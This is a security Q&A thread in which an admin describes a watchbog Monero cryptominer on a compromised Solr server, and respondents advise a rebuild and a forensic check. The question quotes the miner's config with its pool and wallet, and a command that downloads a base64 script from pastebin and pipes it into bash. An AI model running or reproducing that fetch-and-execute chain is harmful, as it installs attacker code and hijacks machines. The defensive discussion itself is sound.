# A process called ./watchbog is mining crypto currency in our server. How do I stop it?

Tags: malware, shellcode

I have found this question below but I need some more clarification that's why I am writing again.

[I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is](https://security.stackexchange.com/questions/199553/i-have-a-process-called-watchbog-that-is-completely-hogging-my-cpu-and-i-dont)

So I did some digging, and found that an executable is being run from the `/tmp` directory. The folder structure is something like this:

```
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data
```

In that folder there are two files, one executable `watchbog` which is actually  being run and one `config.json`. This is the content of the config file,

```
{
    "algo": "cryptonight",
    "api": {
        "port": 0,
        "access-token": null,
        "id": null,
        "worker-id": null,
        "ipv6": false,
        "restricted": true
    },
    "asm": true,
    "autosave": true,
    "av": 0,
    "background": true,
    "colors": true,
    "cpu-affinity": null,
    "cpu-priority": 3,
    "donate-level": 1,
    "huge-pages": false,
    "hw-aes": null,
    "log-file": null,
    "max-cpu-usage": 100,
    "pools": [
        {
            "url": "pool.minexmr.com:443",
            "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
            "pass": "x",
            "rig-id": null,
            "nicehash": false,
            "keepalive": true,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
    ],
    "print-time": 60,
    "retries": 5,
    "retry-pause": 5,
    "safe": false,
    "threads": [
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        },
        {
            "low_power_mode": 1,
            "affine_to_cpu": false,
            "asm": true
        }
    ],
    "user-agent": null,
    "syslog": false,
    "watch": false
}
```

But deleting the folders is not helping, they are being recreated withing few seconds. So I tried to see what other process are running and I found these

```
solr     32616  0.0  0.0   4504   780 ?        Ss   13:10   0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr     32618  0.0  0.0  11224  2924 ?        S    13:10   0:00 bash
solr     32623  0.2  0.0  11644  3376 ?        S    13:10   0:00 /bin/bash
solr     32656  200  0.1 270204  6996 ?        Ssl  13:10   0:26 ./watchbog
```

The pastebin url points to another shell command with another shell command with another pastebin url.

```
(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash
```

This second pastebin url points to a base64 encoded shell script. I can't include it here due to character limitation. Here is the link: https://pastebin.com/raw/nMrfmnRa

I am no expert in this field, but it looks like the script is setting a cron job which downloads the executable again.

This is all I could find on my own, can anyone please guide as to how I can stop this whole thing or would I have to redeploy the server again?

Comment: Your server is compromised, besides the monero miner, there are possible many other compromised including backdoor. Backup important stuff and redeployed server from scratch, install patches and redeploy the server.

Comment: @mootmoot Thank you. I guess i'd have to re deploy the server again.  Any idea on how I could possibly approach on finding out how the compromise happened? One thing I could see that the executable is running as user `solr` in the system, which was created when I installed `solr` in the server. Anyway, it's a borad topic so it's okay if you can't help me with that.

Comment: Well, you can create the compromised server mirror and test out your hypothesis, e.g. check whether your solr installation contains vulnerabilities or allow query injection that compromised the server.

Comment: The coders at least have a sense of humor. At on of the fail points:

"'Sorry boss I can\'t get instructions'"

Comment: It is [Monero Mining malware](https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang) from the Rocke Group, which is a Chinese organization.

Answer (score 5):

From my point of view, there is no way to tell if the rest of the server is safe or not.
If I were you, I'd handpick files to save and recreate a fresh server to ensure that it isn't compromised.
Otherwise you could end up like BlankMediaGames and having files getting leaked years later. Better safe than sorry

Comment: yeah. I'm redeploying again.

Answer (score 0):

Maybe, you can determine if the rest of the server is compromised or not, but It depends of a Forensic investigation.
You can start with a few command and orientation over this link: https://staff.washington.edu/dittrich/misc/forensics/. It is a little bit basic, but will help you to provide a better recomendation to the business instead simply guess.
Meanwhile, I suggest you to create a fresh server to avoid business interruption.

Additionaly, I suggest you to block the malicious URL (the one which communicates over :443) in your network perimeter and check crontab routines.

Ahhhhh... If you found something that is grabbing information from Pastebin, If you have a Pro account, you can ask Pastebin to take down that specific address.